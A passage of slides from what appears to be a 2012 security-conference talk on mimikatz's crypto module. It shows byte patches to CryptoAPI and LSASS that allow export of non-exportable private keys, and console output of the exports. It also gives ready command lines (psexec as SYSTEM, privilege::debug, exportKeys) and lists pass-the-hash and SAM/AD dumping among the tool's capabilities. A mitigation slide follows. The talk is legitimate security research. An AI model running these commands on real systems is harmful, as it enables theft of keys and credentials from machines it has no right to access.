CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO (0x8009000b) Clé non valide pour lutilisation dans létat spécifié. Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 42
  • 43. mimikatz :: crypto :: patchcapi because I own my process So what ? A module in my own process return that I can’t do something ? CryptoAPI is in my memory space, let’s patch it ! .text:0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive .text:0AC0B7CB 90 nop .text:0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive .text:0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare .text:0AC1F749 90 nop .text:0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare I wrote “4” bytes in my memory space07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 43
  • 44. mimikatz :: crypto :: patchcapi demo time ! Import, export, import as not exportable…. export07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 44
  • 45. mimikatz :: crypto :: patchcapi limitations Because : – I’m lazy – I’ve seen in majority of case RSA keys for real life use • Elliptic Curve a little… mimikatz crypto::patchcapi only deal with : – Microsoft Base Cryptographic Provider v1.0 – Microsoft Enhanced Cryptographic Provider v1.0 – Microsoft Enhanced RSA and AES Cryptographic Provider – Microsoft RSA SChannel Cryptographic Provider – Microsoft Strong Cryptographic Provider …all based on rsaenh.dll07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 45
  • 46. mimikatz :: crypto :: cng how it works “Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx “To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default. This time, keys operations are not made in the “user” process context Process use RPC to call “Key isolation service” (keyiso) functions It seems more secure than CryptoAPI… – It is, but it’s not perfect…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 46
  • 47. mimikatz :: crypto :: cng how it’s exported ( PLAYSKOOL level) NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP KeyIso Service (LSASS Process) CNG Exportable Load Private Key DPAPI Decode ? yes no RPC Process Ask to export Key NTE_NOT_SUPPORTED Exported Key07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 47
  • 48. mimikatz :: crypto :: patchcng because sometimes I own LSASS When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey This function do all the work to prepare the export, and check if the key is exportable Exportable ?mimikatz # crypto::exportKeys[user] Clés CNG : - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabilité : NON Taille clé : 2048 Export privé dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) Lopération demandée nest pas prise en charge.07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 48
  • 49. mimikatz :: crypto :: patchcng because sometimes I own LSASS This time, checks and keys are in LSASS process… And what ? .text:6C815210 75 1C jnz short continue_key_export .text:6C815210 EB 1C jmp short continue_key_export I wrote “1” byte in LSASS memory space…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 49
  • 50. mimikatz :: crypto :: patchcng demo time ! Import, export, import as not exportable…. export again07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 50
  • 51. mimikatz :: crypto :: patchcng limitations Patch operation needs some privileges – Admin (debug privilege) – SYSTEM mimikatz crypto::patchcng only deal with : – Microsoft Software Key Storage Provider (maybe others algs than RSA) Not a limitation of mimikatz, but MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu ?) – certutil can…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 51
  • 52. mimikatz :: crypto :: patchcng bonus After one admin patched LSASS, all users of current system benefit of extra exports – until reboot / KeyIso service restart Some others programs that doesn’t check the export flag before asking export can work too – Yeah, like the old good one : certutil C:UsersGentil KiwiDesktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY ================ Certificat 1 ================ […] Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La clé privée NE PEUT PAS être exportée Succès du test de chiffrement CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813) CertUtil: Clé non valide pour lutilisation dans létat spécifié. C:UsersGentil KiwiDesktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY ================ Certificat 1 ================ […] Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succès du test de chiffrement CertUtil: -exportPFX La commande sest terminée correctement.07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 52
  • 53. mimikatz :: crypto memo Some commands :  mimikatz crypto::patchcapi crypto::exportCertificates exit  psexec windows -s -c c:mimikatzWin32mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit Password : – PFX files are protected by this password : mimikatz Keys – When you import multiple time a certificate, exportable or not, Windows make duplicate keys – When you delete a certificate, Windows does not delete its private key… funny isn’t it ? • So yes, mimikatz can export it07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 53
  • 54. mimikatz :: crypto what we can do ? Exactly the same as for sekurlsa, it will prevent access to accounts / computer ! – no admin, no admin, no admin… Basics – Use smartcards/token for users certificates – Use Hardware Security Modules (HSM), even SoftHSM More in depth – See what Microsoft can do with TPM from Windows 8 • Virtual SmartCard seems promising – Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP • Their biometrics stuff was a little buggy ;)07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 54
  • 55. mimikatz what else can it do ? Play with minesweeper Manipulate some handles Pass the hash Dump SAM / AD Stop event monitoring Patch Terminal Server Basic GPO bypass Applocker / SRP bypass Driver – Play with tokens & privileges – Display SSDT x86 & x64 – List minifilters actions – List Notifications (process / thread / image / registry) – List Objects hooks and procedures – … …07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 55
  • 56. mimikatz that’s all folks ! Thanks’ to / Merci à : – my girlfriend for her support (her LSASS crashed few times) – Application Security Forum to offer me this great opportunity • Partners and Sponsors for sure ! – Microsoft to always consider it as normal/acceptable  – Security friends/community for their ideas & challenges • nagual, newsoft, mubix, … – You, for your attention ! Questions ? Don’t be shy ;) especially if you have written the corresponding slide number07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 56
  • 57. Blog, Source Code & Contact blog http://blog.gentilkiwi.com mimikatz http://blog.gentilkiwi.com/mimikatz source https://code.google.com/p/mimikatz/ email benjamin@gentilkiwi.com07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 57

×